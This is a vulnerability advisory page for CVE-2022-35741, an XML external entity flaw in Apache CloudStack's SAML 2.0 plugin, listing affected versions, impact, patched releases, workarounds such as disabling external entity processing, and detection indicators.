CVE-2022-35741 – Apache CloudStack versions 4.5.0 and later cont... (How to Fix)

Q: What is the severity of CVE-2022-35741?

CVE-2022-35741 has a CVSS score of 9.8 (CRITICAL). Apache CloudStack versions 4.5.0 and later contain an XML external entity (XXE) injection vulnerability in the SAML 2.0 authentication plugin. This vulnerability could allow attackers to read arbitrary files, cause denial of service, or perform server-side request forgery attacks. Only systems with the SAML 2.0 plugin enabled are affected.

📋 TL;DR

Apache CloudStack versions 4.5.0 and later contain an XML external entity (XXE) injection vulnerability in the SAML 2.0 authentication plugin. This vulnerability could allow attackers to read arbitrary files, cause denial of service, or perform server-side request forgery attacks. Only systems with the SAML 2.0 plugin enabled are affected.

💻 Affected Systems

Products:

Apache CloudStack

Versions: 4.5.0 and later

Operating Systems: All platforms running affected CloudStack versions

Default Config Vulnerable: ✅ No

Notes: Vulnerability only exists when SAML 2.0 authentication plugin is enabled. Plugin is disabled by default.

📦 What is this software?

Cloudstack by Apache

View all CVEs affecting Cloudstack →

Cloudstack by Apache

View all CVEs affecting Cloudstack →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the CloudStack management server through arbitrary file reading leading to credential theft, SSRF attacks against internal systems, and potential denial of service.

🟠

Likely Case

Unauthorized file system access to read sensitive configuration files, credentials, or other data from the CloudStack management server.

🟢

If Mitigated

No impact if SAML 2.0 plugin is disabled or proper XML parsing controls are implemented.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires SAML 2.0 plugin to be enabled and attacker to interact with SAML authentication endpoints.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.16.1.0, 4.17.0.0, and later versions

Vendor Advisory: https://lists.apache.org/thread/hwhxvtwp1d5dsm156bsf1cnyvtmrfv3f

Restart Required: Yes

Instructions:

1. Upgrade to Apache CloudStack 4.16.1.0, 4.17.0.0, or later. 2. Restart CloudStack management server services. 3. Verify SAML 2.0 plugin functionality if required.

🔧 Temporary Workarounds

Disable SAML 2.0 Plugin

all

Disable the vulnerable SAML 2.0 authentication plugin if not required

Edit CloudStack configuration to disable SAML 2.0 plugin

Implement XML Parsing Controls

all

Configure XML parsers to disable external entity processing

Set XML parser properties: setFeature("http://xml.org/sax/features/external-general-entities", false); setFeature("http://xml.org/sax/features/external-parameter-entities", false);

🧯 If You Can't Patch

Disable SAML 2.0 authentication plugin immediately
Implement network segmentation to restrict access to CloudStack management server SAML endpoints

🔍 How to Verify

Check if Vulnerable:

Check CloudStack version and SAML plugin status: 1. Verify CloudStack version >= 4.5.0. 2. Check if SAML 2.0 plugin is enabled in configuration.

Check Version:

cloudstack-management --version

Verify Fix Applied:

Verify CloudStack version is >= 4.16.1.0 or >= 4.17.0.0 and test SAML authentication functionality if required.

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors in CloudStack logs
Multiple failed SAML authentication attempts
Unexpected file access patterns

Network Indicators:

Unusual XML payloads in SAML authentication requests
Requests to internal resources from CloudStack server

SIEM Query:

source="cloudstack" AND (message="*XXE*" OR message="*XML*" OR message="*SAML*")

📊 Metadata

CVE ID: CVE-2022-35741

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-611

Published: July 18, 2022

Last Updated: November 21, 2024

🔗 References

http://www.openwall.com/lists/oss-security/2022/07/18/2 Mailing List,Mitigation,Third Party Advisory
http://www.openwall.com/lists/oss-security/2022/07/20/1 Mailing List,Mitigation,Third Party Advisory
https://lists.apache.org/thread/hwhxvtwp1d5dsm156bsf1cnyvtmrfv3f Issue Tracking,Mailing List,Mitigation,Patch,Vendor Advisory
http://www.openwall.com/lists/oss-security/2022/07/18/2 Mailing List,Mitigation,Third Party Advisory
http://www.openwall.com/lists/oss-security/2022/07/20/1 Mailing List,Mitigation,Third Party Advisory
https://lists.apache.org/thread/hwhxvtwp1d5dsm156bsf1cnyvtmrfv3f Issue Tracking,Mailing List,Mitigation,Patch,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-35741, you might also want to check these: